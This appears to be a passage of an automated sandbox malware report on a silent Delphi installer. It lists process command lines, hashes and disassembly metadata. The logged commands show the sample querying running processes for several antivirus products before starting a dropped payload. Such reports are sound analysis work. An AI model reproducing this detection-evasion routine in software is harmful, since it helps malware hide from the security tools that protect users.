                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT
                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                              File size:8'767'044 bytes
                                                                                                                                                                                              MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                              Start time:12:08:42
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$10029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT
                                                                                                                                                                                              Imagebase:0x930000
                                                                                                                                                                                              File size:3'367'424 bytes
                                                                                                                                                                                              MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                              Start time:12:09:08
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"timeout" 9
                                                                                                                                                                                              Imagebase:0x7ff6b46f0000
                                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                              Start time:12:09:08
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "wrsa.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "opssvc.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff70f330000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                              Start time:12:09:17
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "avastui.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "avgui.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                              Start time:12:09:18
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                              Start time:12:09:19
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                              Imagebase:0x7ff732b30000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                              Start time:12:09:19
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                              Start time:12:09:19
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                              Imagebase:0x7ff788790000
                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                              Start time:12:09:19
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                              Imagebase:0x7ff66aff0000
                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                              Start time:12:09:23
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              File size:846'325'235 bytes
                                                                                                                                                                                              MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00970810 Relevance: .6, Instructions: 633COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Offset: 00961000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_961000_Set-up.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 59a79728b718c3a1425f7215140f50ecd71f0d8a0bff2132c2790a1c7e092469
                                                                                                                                                                                                • Instruction ID: f20b9cca1d1a20f8c063b3f7c6ebce0af435e855eb12d07b8c7dd924b7ddd58d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 59a79728b718c3a1425f7215140f50ecd71f0d8a0bff2132c2790a1c7e092469
                                                                                                                                                                                                • Instruction Fuzzy Hash: BAD1426244E7C19FDB078B7448756A1BFB0AF93204B1E8ADBC0C5CF4B3D259494AE762

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 07C41798 Relevance: 14.6, Strings: 11, Instructions: 818COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-2551064546
                                                                                                                                                                                                • Opcode ID: a33ad79fa38dcd1dc82a16c3e27ddda8b50cd27ed581469c8a4b32c56ce21423
                                                                                                                                                                                                • Instruction ID: 770f1c81417fb64f311d16f63f7022db82cdeafab57567f5a2a4d967ec726c06
                                                                                                                                                                                                • Opcode Fuzzy Hash: a33ad79fa38dcd1dc82a16c3e27ddda8b50cd27ed581469c8a4b32c56ce21423
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D428CB1B043198FCB258B69885577ABBF2AFC5311F1880AAD585CF251DB31CDC2C7A1
                                                                                                                                                                                                Function 03435E30 Relevance: .6, Instructions: 628COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c673e485a7857e26560d5ed527f73cc26d6aa23deb5bf5e0012b163796461286
                                                                                                                                                                                                • Instruction ID: ba359cb04c86f5d9a44114f3a5d79078620b5cbf7d4944afcbd7eba2e2d5ab64
                                                                                                                                                                                                • Opcode Fuzzy Hash: c673e485a7857e26560d5ed527f73cc26d6aa23deb5bf5e0012b163796461286
                                                                                                                                                                                                • Instruction Fuzzy Hash: 83425C74A00219AFCB05CF98C484AAEFBB1FF4D310F29859AE855AB355C735ED81CB94
                                                                                                                                                                                                Function 03432F78 Relevance: .5, Instructions: 476COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8715eea1e8f627925b3d62cc784231dbe48f2e502ffda547186af9853c133dfb
                                                                                                                                                                                                • Instruction ID: 2afa75d401b1648f2a83820521de0c2ea0d9c694edfb5c4f388c868d0dae1a64
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8715eea1e8f627925b3d62cc784231dbe48f2e502ffda547186af9853c133dfb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32126C74A042199FCB05CF98C484AAEFBB2FF49310F28859AE815AF355C735ED81CB94
                                                                                                                                                                                                Function 03434900 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1964001360.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_3430000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4369e79802eadc6baae1cefe7d0275e49aa8a87e678f95beba21948b48c56c79
                                                                                                                                                                                                • Instruction ID: 8ca830f2d76984a34c903fd333efa612bc8282a98c14e916e978b3d004e2e6ec
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4369e79802eadc6baae1cefe7d0275e49aa8a87e678f95beba21948b48c56c79
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C02AE71D093949FCB02DB68D4A0ADDBFF1EF4A210F198097E454AF362C634AD46CB99
                                                                                                                                                                                                Function 07C41A54 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8ebff16c9daeadcf40d28362a373cf48c0c89e01062a70d53993c334b0495c15
                                                                                                                                                                                                • Instruction ID: fa9fa27e3a6f1535488d0b5fced09c87b508a95e6a202e0ba49f8431db634a79
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebff16c9daeadcf40d28362a373cf48c0c89e01062a70d53993c334b0495c15
                                                                                                                                                                                                • Instruction Fuzzy Hash: 654127F1A0030ADFCB248F648A8566A7BF2AF81354F4C80A5DD849F251E735DAC6C7E1
                                                                                                                                                                                                Function 07C41A68 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.1972379608.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
